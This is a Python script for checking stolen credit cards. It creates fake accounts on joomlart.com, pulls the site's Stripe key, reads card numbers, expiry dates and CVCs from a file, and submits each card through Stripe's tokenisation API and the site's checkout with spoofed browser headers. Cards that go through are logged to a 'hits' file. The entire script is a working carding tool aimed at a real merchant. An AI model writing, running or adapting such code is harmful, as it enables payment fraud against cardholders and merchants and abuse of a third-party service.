

import requests
import random
from bs4 import BeautifulSoup
import re
from faker import Faker
from uuid import uuid4
from secrets import token_hex

faker = Faker()
for _ in range(1):
    bb = 'qwaszxcerdfvbtyghnmjkluiop0987654321'
    hell = ''.join(random.choice(bb) for i in range(14))
    domin = random.choice(['@hotmail.com', '@aol.com', '@gmail.com', '@yahoo.com'])
    eim = hell + domin
    name = faker.first_name()
    password = token_hex(8)

    headers = {
        'authority': 'www.joomlart.com',
        'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'accept-language': 'ar-YE,ar;q=0.9,en-YE;q=0.8,en-US;q=0.7,en;q=0.6',
        'cache-control': 'max-age=0',
        'content-type': 'application/x-www-form-urlencoded',
        'origin': 'https://www.joomlart.com',
        'referer': 'https://www.joomlart.com/member/signup?product=10',
        'sec-ch-ua': '"Not)A;Brand";v="24", "Chromium";v="116"',
        'sec-ch-ua-mobile': '?1',
        'sec-ch-ua-platform': '"Android"',
        'sec-fetch-dest': 'document',
        'sec-fetch-mode': 'navigate',
        'sec-fetch-site': 'same-origin',
        'sec-fetch-user': '?1',
        'upgrade-insecure-requests': '1',
        'user-agent': 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36',
    }

    data = {
        '_save_': 'page-0',
        'coupon': '',
        'paysys_id': 'stripe',
        'product_id_page-0[]': '10-12',
        'uni_product_id': '10-12',
        'email': f'{eim}',
        'login': f'{name}12345Mahos',
        'pass': f'{password}',
        '_newsletter': '1',
        '_i_agree[agreement-default]': '1',
        '_qf_page-0_next': 'Next',
    }

    response = requests.post('https://www.joomlart.com/member/signup', headers=headers, data=data).text
    soup = BeautifulSoup(response, 'html.parser')
    id_input = soup.find('input', {'name': 'id'})
    id = id_input['value']
    email_script = soup.find('script', {'data-email': True})
    email = email_script['data-email']
    stripe_script = soup.find('script', {'src': 'https://checkout.stripe.com/checkout.js'})
    pkey = stripe_script['data-key']


def strip():
    mahos = input(f'Enter the file Name: ')
    with open(mahos, 'r') as file:
        for P in file:
            P = P.strip()
            n, mm, yy, cvc = map(str.strip, P.split("|"))
            if not yy.startswith('20'):
                yy = '20' + yy
            hed = {
                'authority': 'api.stripe.com',
                'accept': 'application/json',
                'accept-language': 'en',
                'content-type': 'application/x-www-form-urlencoded',
                'origin': 'https://checkout.stripe.com',
                'referer': 'https://checkout.stripe.com/',
                'sec-ch-ua': '"Not)A;Brand";v="24", "Chromium";v="116"',
                'sec-ch-ua-mobile': '?1',
                'sec-ch-ua-platform': '"Android"',
                'sec-fetch-dest': 'empty',
                'sec-fetch-mode': 'cors',
                'sec-fetch-site': 'same-site',
                'user-agent': 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36',
            }
            de = f'email={email}&validation_type=card&payment_user_agent=Stripe+Checkout+v3+(stripe.js%2F78ef418)&user_agent=Mozilla%2F5.0+(Linux%3B+Android+10%3B+K)+AppleWebKit%2F537.36+(KHTML%2C+like+Gecko)+Chrome%2F116.0.0.0+Mobile+Safari%2F537.36&device_id={uuid4()}&referrer=https%3A%2F%2Fwww.joomlart.com%2Fmember%2Fpayment%2Fstripe%2Fcc&time_checkout_opened=1713987020&time_checkout_loaded=1713987019&card[number]={n}&card[cvc]={cvc}&card[exp_month]={mm}&card[exp_year]={yy}&card[name]=hqzt8vjub%40waterisgone.com&time_on_page=94808&guid={uuid4()}&muid={uuid4()}&sid={uuid4()}&key={pkey}'
            rr = requests.post('https://api.stripe.com/v1/tokens', headers=hed, data=de).json()
            try:
                tok = rr["id"]
            except:
                tok = ''
            CheckCard(id, email, tok, P)

def CheckCard(id, email, tok, P):
    hd = {
        'authority': 'www.joomlart.com',
        'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'accept-language': 'ar-YE,ar;q=0.9,en-YE;q=0.8,en-US;q=0.7,en;q=0.6',
        'cache-control': 'max-age=0',
        'content-type': 'application/x-www-form-urlencoded',
        'origin': 'https://www.joomlart.com',
        'referer': 'https://www.joomlart.com/member/payment/stripe/cc',
        'sec-ch-ua': '"Not)A;Brand";v="24", "Chromium";v="116"',
        'sec-ch-ua-mobile': '?0',
        'sec-ch-ua-platform': '"Linux"',
        'sec-fetch-dest': 'document',
        'sec-fetch-mode': 'navigate',
        'sec-fetch-site': 'same-origin',
        'sec-fetch-user': '?1',
        'upgrade-insecure-requests': '1',
        'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',
    }
    da = {
        '_save_': 'cc-stripe',
        'id': id,
        'stripeToken': tok,
        'stripeTokenType': 'card',
        'stripeEmail': email,
    }
    req = requests.post('https://www.joomlart.com/member/payment/stripe/cc', headers=hd, data=da)
    er = re.search('<ul class="errors"><li>(.*?)</li></ul>', req.text)
    if er:
        print(f'Your card was Declined.! : [ {P} ]')
    else:
        print(f' Approved .!! : [ {P} ]')
        open('hits.txt','a').write(f'{P}\n')
    
        
strip()
